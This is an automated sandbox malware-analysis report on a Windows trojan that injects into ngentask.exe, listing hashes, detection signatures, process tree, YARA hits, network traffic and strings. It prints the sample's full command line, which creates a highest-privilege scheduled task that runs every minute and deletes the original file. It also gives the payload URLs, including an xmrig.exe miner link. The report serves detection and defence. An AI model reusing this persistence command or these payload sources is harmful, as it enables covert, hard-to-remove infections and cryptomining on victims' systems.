Create Interactive Tour

Windows Analysis Report
QHSgso4hXH.exe

Overview

General Information

Sample Name:QHSgso4hXH.exe
Analysis ID:749056
MD5:2f8df206ba700503dbebf59e937af0ec
SHA1:7c36d57af94f2dd16a62c09356b4ef2c63e456fd
SHA256:6bb1564eca89071edd9c42b84481aed5f3f5aaccedb8f61d6fb892b7f08bdca7
Tags:32exetrojan
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Sigma detected: Schedule binary from dotnet directory
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Injects a PE file into a foreign processes
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • QHSgso4hXH.exe (PID: 2840 cmdline: C:\Users\user\Desktop\QHSgso4hXH.exe MD5: 2F8DF206BA700503DBEBF59E937AF0EC)
    • ngentask.exe (PID: 3128 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)
      • cmd.exe (PID: 2148 cmdline: C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • chcp.com (PID: 5432 cmdline: chcp 65001 MD5: 561054CF9C4B2897E80D7E7D9027FED9)
        • PING.EXE (PID: 5416 cmdline: ping 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)
        • schtasks.exe (PID: 5592 cmdline: schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
        • ngentask.exe (PID: 5788 cmdline: "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" MD5: ED7F195F7121781CC3D380942765B57D)
          • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ngentask.exe (PID: 4512 cmdline: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)
    • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ngentask.exe (PID: 5420 cmdline: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)
    • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ngentask.exe (PID: 684 cmdline: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe MD5: ED7F195F7121781CC3D380942765B57D)
    • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0xc7aba:$xo1: \x8E\xC3\xAC\xC3\xB9\xC3\xAA\xC3\xAF\xC3\xAF\xC3\xA2\xC3\xEC\xC3\xF6\xC3\xED\xC3\xF3\xC3
00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x6e:$xo1: \x97\xAB\xAA\xB0\xE3\xB3\xB1\xAC\xA4\xB1\xA2\xAE\xE3\xA0\xA2\xAD\xAD\xAC\xB7\xE3\xA1\xA6\xE3\xB1\xB6\xAD\xE3\xAA\xAD\xE3\x87\x8C\x90\xE3\xAE\xAC\xA7\xA6

Malware Analysis System Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe, CommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe, ParentProcessId: 3128, ParentProcessName: ngentask.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe, ProcessId: 2148, ProcessName: cmd.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: QHSgso4hXH.exeReversingLabs: Detection: 32%
Source: QHSgso4hXH.exeVirustotal: Detection: 34%Perma Link
Source: http://193.218.201.246/xmrig.exeAvira URL Cloud: Label: malware
Source: QHSgso4hXH.exeJoe Sandbox ML: detected
Source: 0.3.QHSgso4hXH.exe.c190000.0.unpackAvira: Label: TR/ATRAPS.Gen
Source: 1.0.ngentask.exe.400000.0.unpackAvira: Label: TR/ATRAPS.Gen
Source: 0.3.QHSgso4hXH.exe.c190000.1.unpackAvira: Label: TR/ATRAPS.Gen
Source: QHSgso4hXH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 160.153.50.70:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: Binary string: NGenTask.pdb source: ngentask.exe, 00000008.00000000.291902355.00000000006D2000.00000002.00000001.01000000.00000008.sdmp, ngentask.exe.1.dr

Networking

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 160.153.50.70 160.153.50.70
Source: global trafficHTTP traffic detected: GET /library.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Host: www.imarket-eg.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Nov 2022 06:52:45 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.imarket-eg.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: _eshoob=1; expires=Fri, 25-Nov-2022 06:52:46 GMT; Max-Age=604800; path=/Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: advapi32.dll.0.drString found in binary or memory: <a href="https://www.facebook.com/imarketegypt/"> equals www.facebook.com (Facebook)
Source: advapi32.dll.0.drString found in binary or memory: <a href="https://www.linkedin.com/in/imarket-marketing-agency-a80a82213/"> equals www.linkedin.com (Linkedin)
Source: advapi32.dll.0.drString found in binary or memory: <a href="https://www.youtube.com/channel/UCoLhJ3CIgGI8Rvq_S_TkcFg"> equals www.youtube.com (Youtube)
Source: advapi32.dll.0.drString found in binary or memory: src="https://www.facebook.com/tr?id=275694772967027&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: ngentask.exe, 00000001.00000002.275257695.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.218.201.246/xmrig.exe
Source: ngentask.exe, 00000001.00000002.275257695.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.218.201.246/xmrig.exe(KKl
Source: ngentask.exe, 00000001.00000002.275257695.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QHSgso4hXH.exeString found in binary or memory: http://vXsLjUXgEkdPUv.307xVYtdN0
Source: QHSgso4hXH.exe, 00000000.00000002.520178129.0000000002A1B000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: http://vXsLjUXgEkdPUv.307xVYtdN0h8WhldS19UlhMR80~
Source: advapi32.dll.0.drString found in binary or memory: https://analytify.io/downloads/analytify-wordpress-plugin/
Source: advapi32.dll.0.drString found in binary or memory: https://api.w.org/
Source: advapi32.dll.0.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: advapi32.dll.0.drString found in binary or memory: https://fonts.googleapis.com/css?family=Poppins%3A100%2C100italic%2C200%2C200italic%2C300%2C300itali
Source: advapi32.dll.0.drString found in binary or memory: https://fonts.gstatic.com
Source: advapi32.dll.0.drString found in binary or memory: https://gmpg.org/xfn/11
Source: advapi32.dll.0.drString found in binary or memory: https://instagram.com/imarketegypt?utm_medium=copy_link
Source: advapi32.dll.0.drString found in binary or memory: https://twitter.com/imarketegypt
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/about-imarket/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/blog/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/branding/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/business-consulting/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/comments/feed/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/contact-us/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/contact-us/#
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/designs/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/elementor-524/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/feed/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/google-ads/
Source: QHSgso4hXH.exeString found in binary or memory: https://www.imarket-eg.com/library.bin
Source: QHSgso4hXH.exe, 00000000.00000002.520178129.0000000002A1B000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.imarket-eg.com/library.bini3NC8vtbKWLvXsWnllFS6z1xMD07Gw9nfzJIj6wDIzGzCefljal5yvndAtCkYM
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/search-user-optimization/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/services/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/social-media-marketing/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/social-media/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/videography/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/web-design-2/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/web-design/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/chaty/css/chaty-front.min.css?ver=1630326243
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/chaty/js/cht-front-script.js?ver=1630326243
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-product-display
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-sticky-frontend
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de_loop/ecs-style.
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-de-caro
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/dethemekit-widgets
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/htflexboxgrid.css?
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/simple-line-icons.
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/slick.css?ver=1.5.
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-active-icon-box.
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de-sticky-frontend.
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs.js?ver=
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs_ajax_pa
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-1.12.4-wp.js
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/jquery-migrate-1.4.
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/ResizeSensor.mi
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/jsticky/jquery.
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/lib/sticky-sidebar/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/css/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/a
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/d
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/i
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/l
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/m
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/includes/ext/sina/assets/js/s
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.3.0
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.3.0
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.mi
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?v
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.4.8
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.8
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.8
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.8
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.8
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.cs
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);s
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#ei
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ve
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.5/lazyload.min.js
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/themes/hello-elementor/style.min.css?ver=2.3.1
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.3.1
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244-300x96.png
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/uploads/2021/06/Logo-e1624927275244.png
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-180x180.jpg
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-192x192.jpg
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-270x270.jpg
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/uploads/2021/06/cropped-I-32x32.jpg
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-13.css?ver=1637579037
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-164.css?ver=1637579040
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-171.css?ver=1637579040
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-content/uploads/elementor/css/post-196.css?ver=1637579583
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-includes/wlwmanifest.xml
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/wp-json/
Source: advapi32.dll.0.drString found in binary or memory: https://www.imarket-eg.com/xmlrpc.php?rsd
Source: advapi32.dll.0.drString found in binary or memory: https://www.linkedin.com/in/imarket-marketing-agency-a80a82213/
Source: advapi32.dll.0.drString found in binary or memory: https://www.youtube.com/channel/UCoLhJ3CIgGI8Rvq_S_TkcFg
Source: unknownDNS traffic detected: queries for: vxsljuxgekdpuv.307xvytdn0
Source: global trafficHTTP traffic detected: GET /library.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Host: www.imarket-eg.com
Source: unknownHTTPS traffic detected: 160.153.50.70:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: QHSgso4hXH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02A23A90
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC9AD0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC5A20
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACCA20
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACA230
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACEA30
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ABFA10
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC3260
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02A78A50
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACDBA0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC93B0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AAA390
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AD0B90
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC1BF0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02A793D0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC5BD0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ABF320
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACE320
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02A7DB10
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC2B70
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC1350
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC6350
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACF8A0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACD880
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC00D0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC6020
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC7810
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC4060
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACB060
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AD0050
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC89F0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACD9F0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACA930
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC9910
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACF160
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACE160
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC3970
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC7170
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AD0EA0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC7EE0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACF6E0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC1630
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC4E30
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACBE50
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACB780
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC4790
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC07D0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC0F20
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACE760
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AD0750
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC24B0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC54F0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AD1CC0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC8CD0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACC420
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACD400
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC85A0
